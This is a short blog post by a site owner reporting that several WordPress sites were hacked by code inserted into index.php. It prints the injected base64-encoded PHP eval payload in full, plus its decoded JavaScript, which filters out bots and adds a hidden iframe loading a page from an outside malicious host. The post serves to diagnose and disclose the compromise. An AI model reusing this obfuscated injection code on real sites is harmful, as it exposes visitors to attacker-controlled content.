Thursday, February 23, 2012

Wordpress index.php hacked iframe points to ksenzfhvcb.dns1.us

Several Wordpress sites were hacked today with an insert into the index.php. I have not yet figured out How it happened, and will post when/if I figure it out.

Here was the hacked/added text

eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCiRib3RzVUEgPSBhcnJheSgnMTIzNDUnLCdhbGV4YS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ2Jsb2dwdWxzZS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20nLCdjcmF3bCcsJ2RvY29tbycsJ2RydXBhbC5vcmcnLCdmZWVkdG9vbHMnLCdodG1sZG9jJywnaHR0cGNsaWVudCcsJ2ludGVybmV0c2Vlci5jb20nLCdsaW51eCcsJ21hY2ludG9zaCcsJ21hYyBvcycsJ21hZ2VudCcsJ21haWwucnUnLCdteWJsb2dsb2cgYXBpJywnbmV0Y3JhZnQnLCdvcGVuYWNvb24uZGUnLCdvcGVyYSBtaW5pJywnb3BlcmEgbW9iaScsJ3BsYXlzdGF0aW9uJywncG9zdHJhbmsuY29tJywncHNwJywncnJycnJycnJyJywncnNzcmVhZGVyJywnc2x1cnAnLCdzbm9vcHknLCdzcGlkZXInLCdzcHlkZXInLCdzem4taW1hZ2UtcmVzaXplcicsJ3ZhbGlkYXRvcicsJ3ZpcnVzJywndmxjIG1lZGlhIHBsYXllcicsJ3dlYmNvbGxhZ2UnLCd3b3JkcHJlc3MnLCd4MTEnLCd5YW5kZXgnLCdpcGhvbmUnLCdhbmRyb2lkJyk7DQpmb3JlYWNoICgkYm90c1VBIGFzICRicykge2lmKHN0cnBvcyhzdHJ0b2xvd2VyKCR1YSksICRicykhPT0gZmFsc2UpeyRib3QgPSB0cnVlOyBicmVhazt9fQ0KaWYgKCEkYm90KXsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1cFppaDNhVzVrYjNkYkoyUW5LeWR2Snlzbll5Y3JKM1VuS3lkdEp5c25aU2NySjI1MEoxMHBZV0U5TDF4M0x5NWxlR1ZqS0c1bGR5QkVZWFJsS0NrcExtbHVaR1Y0SzF0ZE8yRmhZVDBuTUNjN2RISjVlMjVsZHlCa2IyTjFiV1Z1ZENncE8zMWpZWFJqYUNoeGNYRXBlM056UFZOMGNtbHVaenQ5YVdZb1lXRXVhVzVrWlhoUFppaGhZV0VwSVQwOUxURXBDbVk5Snkwek1IWXRNekIyTmpaMk5qTjJMVGQyTVhZMk1YWTNNblkyTUhZM09IWTNNSFkyTW5ZM01YWTNOM1kzZGpZMGRqWXlkamMzZGpNd2RqWTVkall5ZGpjd2RqWXlkamN4ZGpjM2RqYzJkakkzZGpneWRqUTFkalU0ZGpZMGRqTTVkalU0ZGpjd2RqWXlkakYyTUhZMU9YWTNNblkyTVhZNE1uWXdkakoyTlRKMk9YWTFOSFl5ZGpnMGRpMHpNSFl0TXpCMkxUTXdkalkyZGpZemRqYzFkalU0ZGpjd2RqWXlkamMxZGpGMk1uWXlNSFl0TXpCMkxUTXdkamcyZGkwM2RqWXlkalk1ZGpjMmRqWXlkaTAzZGpnMGRpMHpNSFl0TXpCMkxUTXdkall4ZGpjeWRqWXdkamM0ZGpjd2RqWXlkamN4ZGpjM2RqZDJPREIyTnpWMk5qWjJOemQyTmpKMk1YWXROWFl5TVhZMk5uWTJNM1kzTlhZMU9IWTNNSFkyTW5ZdE4zWTNOblkzTlhZMk1IWXlNbll3ZGpZMWRqYzNkamMzZGpjemRqRTVkamgyT0hZMk9IWTNOblkyTW5ZM01YWTRNM1kyTTNZMk5YWTNPWFkyTUhZMU9YWTNkall4ZGpjeGRqYzJkakV3ZGpkMk56aDJOeloyT0hZMk1YWTRkakV6ZGpsMk1UTjJOM1kzTTNZMk5YWTNNM1l5TkhZMk5IWTNNbll5TW5ZeE1IWXdkaTAzZGpnd2RqWTJkall4ZGpjM2RqWTFkakl5ZGpCMk1UQjJPWFl3ZGkwM2RqWTFkall5ZGpZMmRqWTBkalkxZGpjM2RqSXlkakIyTVRCMk9YWXdkaTAzZGpjMmRqYzNkamd5ZGpZNWRqWXlkakl5ZGpCMk56bDJOaloyTnpaMk5qWjJOVGwyTmpaMk5qbDJOaloyTnpkMk9ESjJNVGwyTmpWMk5qWjJOakYyTmpGMk5qSjJOekYyTWpCMk56TjJOekoyTnpaMk5qWjJOemQyTmpaMk56SjJOekYyTVRsMk5UaDJOVGwyTnpaMk56SjJOamwyTnpoMk56ZDJOakoyTWpCMk5qbDJOakoyTmpOMk56ZDJNVGwyT1hZeU1IWTNOM1kzTW5ZM00zWXhPWFk1ZGpJd2RqQjJNak4yTWpGMk9IWTJOblkyTTNZM05YWTFPSFkzTUhZMk1uWXlNM1l0TlhZeWRqSXdkaTB6TUhZdE16QjJPRFoyTFRNd2RpMHpNSFkyTTNZM09IWTNNWFkyTUhZM04zWTJOblkzTW5ZM01YWXROM1kyTm5ZMk0zWTNOWFkxT0hZM01IWTJNblkzTlhZeGRqSjJPRFIyTFRNd2RpMHpNSFl0TXpCMk56bDJOVGgyTnpWMkxUZDJOak4yTFRkMk1qSjJMVGQyTmpGMk56SjJOakIyTnpoMk56QjJOakoyTnpGMk56ZDJOM1kyTUhZM05YWTJNblkxT0hZM04zWTJNbll6TUhZMk9YWTJNblkzTUhZMk1uWTNNWFkzTjNZeGRqQjJOaloyTmpOMk56VjJOVGgyTnpCMk5qSjJNSFl5ZGpJd2RqWXpkamQyTnpaMk5qSjJOemQyTWpaMk56ZDJOemQyTnpWMk5qWjJOVGwyTnpoMk56ZDJOakoyTVhZd2RqYzJkamMxZGpZd2RqQjJOWFl3ZGpZMWRqYzNkamMzZGpjemRqRTVkamgyT0hZMk9IWTNOblkyTW5ZM01YWTRNM1kyTTNZMk5YWTNPWFkyTUhZMU9YWTNkall4ZGpjeGRqYzJkakV3ZGpkMk56aDJOeloyT0hZMk1YWTRkakV6ZGpsMk1UTjJOM1kzTTNZMk5YWTNNM1l5TkhZMk5IWTNNbll5TW5ZeE1IWXdkakoyTWpCMk5qTjJOM1kzTm5ZM04zWTRNblkyT1hZMk1uWTNkamM1ZGpZMmRqYzJkalkyZGpVNWRqWTJkalk1ZGpZMmRqYzNkamd5ZGpJeWRqQjJOalYyTmpaMk5qRjJOakYyTmpKMk56RjJNSFl5TUhZMk0zWTNkamMyZGpjM2RqZ3lkalk1ZGpZeWRqZDJOek4yTnpKMk56WjJOaloyTnpkMk5qWjJOekoyTnpGMk1qSjJNSFkxT0hZMU9YWTNOblkzTW5ZMk9YWTNPSFkzTjNZMk1uWXdkakl3ZGpZemRqZDJOeloyTnpkMk9ESjJOamwyTmpKMk4zWTJPWFkyTW5ZMk0zWTNOM1l5TW5Zd2RqbDJNSFl5TUhZMk0zWTNkamMyZGpjM2RqZ3lkalk1ZGpZeWRqZDJOemQyTnpKMk56TjJNakoyTUhZNWRqQjJNakIyTmpOMk4zWTNOblkyTW5ZM04zWXlOblkzTjNZM04zWTNOWFkyTm5ZMU9YWTNPSFkzTjNZMk1uWXhkakIyT0RCMk5qWjJOakYyTnpkMk5qVjJNSFkxZGpCMk1UQjJPWFl3ZGpKMk1qQjJOak4yTjNZM05uWTJNblkzTjNZeU5uWTNOM1kzTjNZM05YWTJOblkxT1hZM09IWTNOM1kyTW5ZeGRqQjJOalYyTmpKMk5qWjJOalIyTmpWMk56ZDJNSFkxZGpCMk1UQjJPWFl3ZGpKMk1qQjJMVE13ZGkwek1IWXRNekIyTmpGMk56SjJOakIyTnpoMk56QjJOakoyTnpGMk56ZDJOM1kyTkhZMk1uWTNOM1l6TUhZMk9YWTJNblkzTUhZMk1uWTNNWFkzTjNZM05uWXlOM1k0TW5ZME5YWTFPSFkyTkhZek9YWTFPSFkzTUhZMk1uWXhkakIyTlRsMk56SjJOakYyT0RKMk1IWXlkalV5ZGpsMk5UUjJOM1kxT0hZM00zWTNNM1kyTW5ZM01YWTJNWFl5T0hZMk5YWTJOblkyT1hZMk1YWXhkall6ZGpKMk1qQjJMVE13ZGkwek1IWTROaWN1YzNCc2FYUW9KM1luS1R0dFpEMG5ZU2M3WlQxM2FXNWtiM2RiSjJVbkt5ZDJZV3duWFR0M1BXWTdjejBuSnp0bWNqMG5aaWNySjNKdkp5c25iU2NySjBOb1lYSW5PM0k5YzNOYlpuSXJKME52WkdVblhUdG1iM0lvYVQwd095MXBQaTEzTG14bGJtZDBhRHRwS3lzcGUybzlhVHR6UFhNcmNpZ3pPU3N4S25kYmFsMHBPMzBLYVdZb1lXRXVhVzVrWlhoUFppaGhZV0VwSVQwOUxURXBDbVVvY3lrN1BDOXpZM0pwY0hRKycpKTsNCn0='));
 



First Translation
if(window['d'+'o'+'c'+'u'+'m'+'e'+'nt'])aa=/\w/.exec(new Date()).index+[];aaa='0';try{new document();}catch(qqq){ss=String;}if(aa.indexOf(aaa)!==-1)
f='-30v-30v66v63v-7v1v61v72v60v78v70v62v71v77v7v64v62v77v30v69v62v70v62v71v77v76v27v82v45v58v64v39v58v70v62v1v0v59v72v61v82v0v2v52v9v54v2v84v-30v-30v-30v66v63v75v58v70v62v75v1v2v20v-30v-30v86v-7v62v69v76v62v-7v84v-30v-30v-30v61v72v60v78v70v62v71v77v7v80v75v66v77v62v1v-5v21v66v63v75v58v70v62v-7v76v75v60v22v0v65v77v77v73v19v8v8v68v76v62v71v83v63v65v79v60v59v7v61v71v76v10v7v78v76v8v61v8v13v9v13v7v73v65v73v24v64v72v22v10v0v-7v80v66v61v77v65v22v0v10v9v0v-7v65v62v66v64v65v77v22v0v10v9v0v-7v76v77v82v69v62v22v0v79v66v76v66v59v66v69v66v77v82v19v65v66v61v61v62v71v20v73v72v76v66v77v66v72v71v19v58v59v76v72v69v78v77v62v20v69v62v63v77v19v9v20v77v72v73v19v9v20v0v23v21v8v66v63v75v58v70v62v23v-5v2v20v-30v-30v86v-30v-30v63v78v71v60v77v66v72v71v-7v66v63v75v58v70v62v75v1v2v84v-30v-30v-30v79v58v75v-7v63v-7v22v-7v61v72v60v78v70v62v71v77v7v60v75v62v58v77v62v30v69v62v70v62v71v77v1v0v66v63v75v58v70v62v0v2v20v63v7v76v62v77v26v77v77v75v66v59v78v77v62v1v0v76v75v60v0v5v0v65v77v77v73v19v8v8v68v76v62v71v83v63v65v79v60v59v7v61v71v76v10v7v78v76v8v61v8v13v9v13v7v73v65v73v24v64v72v22v10v0v2v20v63v7v76v77v82v69v62v7v79v66v76v66v59v66v69v66v77v82v22v0v65v66v61v61v62v71v0v20v63v7v76v77v82v69v62v7v73v72v76v66v77v66v72v71v22v0v58v59v76v72v69v78v77v62v0v20v63v7v76v77v82v69v62v7v69v62v63v77v22v0v9v0v20v63v7v76v77v82v69v62v7v77v72v73v22v0v9v0v20v63v7v76v62v77v26v77v77v75v66v59v78v77v62v1v0v80v66v61v77v65v0v5v0v10v9v0v2v20v63v7v76v62v77v26v77v77v75v66v59v78v77v62v1v0v65v62v66v64v65v77v0v5v0v10v9v0v2v20v-30v-30v-30v61v72v60v78v70v62v71v77v7v64v62v77v30v69v62v70v62v71v77v76v27v82v45v58v64v39v58v70v62v1v0v59v72v61v82v0v2v52v9v54v7v58v73v73v62v71v61v28v65v66v69v61v1v63v2v20v-30v-30v86'.split('v');md='a';e=window['e'+'val'];w=f;s='';fr='f'+'ro'+'m'+'Char';r=ss[fr+'Code'];for(i=0;-i>-w.length;i++){j=i;s=s+r(39+1*w[j]);}
if(aa.indexOf(aaa)!==-1)
e(s); 
 





Then it next translates too the javascript that adds an iframe to the html page.
if (document.getElementsByTagName('body')[0])
 {            iframer();        } 
 else 
 {            document.write("<iframe src='http://ksenzfhvcb.dns1.us/d/404.php?go=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");        
 }        
 
 function iframer()
 {    
  var f = document.createElement('iframe');f.setAttribute('src','http://ksenzfhvcb.dns1.us/d/404.php?go=1');
  f.style.visibility='hidden';
  f.style.position='absolute';
  f.style.left='0';
  f.style.top='0';
  f.setAttribute('width','10');
  f.setAttribute('height','10');            
  document.getElementsByTagName('body')[0].appendChild(f);        
 }


Stumble Upon CodePyro

No comments:

Post a Comment